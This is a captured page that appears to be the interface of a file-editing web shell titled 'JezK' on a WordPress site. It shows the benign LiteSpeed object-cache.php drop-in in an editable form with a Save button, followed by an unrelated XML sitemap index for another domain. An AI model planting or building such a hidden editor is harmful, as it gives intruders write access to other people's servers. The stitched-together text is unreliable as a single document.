
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: object-cache.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
// phpcs:ignoreFile

/**
 * Plugin Name:       LiteSpeed Cache - Object Cache (Drop-in)
 * Plugin URI:        https://www.litespeedtech.com/products/cache-plugins/wordpress-acceleration
 * Description:       High-performance page caching and site optimization from LiteSpeed.
 * Author:            LiteSpeed Technologies
 * Author URI:        https://www.litespeedtech.com
 */

defined( &#039;WPINC&#039; ) || exit;
/**
 * LiteSpeed Object Cache
 *
 * @since  1.8
 */

! defined( &#039;LSCWP_OBJECT_CACHE&#039; ) &amp;&amp; define( &#039;LSCWP_OBJECT_CACHE&#039;, true );

// Initialize const `LSCWP_DIR` and locate LSCWP plugin folder
$lscwp_dir = ( defined( &#039;WP_PLUGIN_DIR&#039; ) ? WP_PLUGIN_DIR : WP_CONTENT_DIR . &#039;/plugins&#039; ) . &#039;/litespeed-cache/&#039;;

// Use plugin as higher priority than MU plugin
if ( ! file_exists( $lscwp_dir . &#039;litespeed-cache.php&#039; ) ) {
	// Check if is mu plugin or not
	$lscwp_dir = ( defined( &#039;WPMU_PLUGIN_DIR&#039; ) ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . &#039;/mu-plugins&#039; ) . &#039;/litespeed-cache/&#039;;
	if ( ! file_exists( $lscwp_dir . &#039;litespeed-cache.php&#039; ) ) {
		$lscwp_dir = &#039;&#039;;
	}
}

$data_file = WP_CONTENT_DIR . &#039;/.litespeed_conf.dat&#039;;
$lib_file  = $lscwp_dir . &#039;src/object.lib.php&#039;;

// Can&#039;t find LSCWP location, terminate object cache process
if ( ! $lscwp_dir || ! file_exists( $data_file ) || ( ! file_exists( $lib_file ) ) ) {
	if ( ! is_admin() ) { // Bypass object cache for frontend
		require_once ABSPATH . WPINC . &#039;/cache.php&#039;;
	} else {
		$err = &#039;Can NOT find LSCWP path for object cache initialization in &#039; . __FILE__;
		error_log( $err );
		add_action(
			is_network_admin() ? &#039;network_admin_notices&#039; : &#039;admin_notices&#039;,
			function () use ( &amp;$err ) {
				echo $err;
			}
		);
	}
} elseif ( ! LSCWP_OBJECT_CACHE ) {
	// Disable cache
		wp_using_ext_object_cache( false );
}
	// Init object cache &amp; LSCWP
elseif ( file_exists( $lib_file ) ) {
	require_once $lib_file;
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//freemoney.it.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://freemoney.it.com/post-sitemap.xml</loc>
		<lastmod>2026-09-06T18:08:19+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://freemoney.it.com/page-sitemap.xml</loc>
		<lastmod>2026-08-31T10:13:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://freemoney.it.com/category-sitemap.xml</loc>
		<lastmod>2026-09-06T18:08:19+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->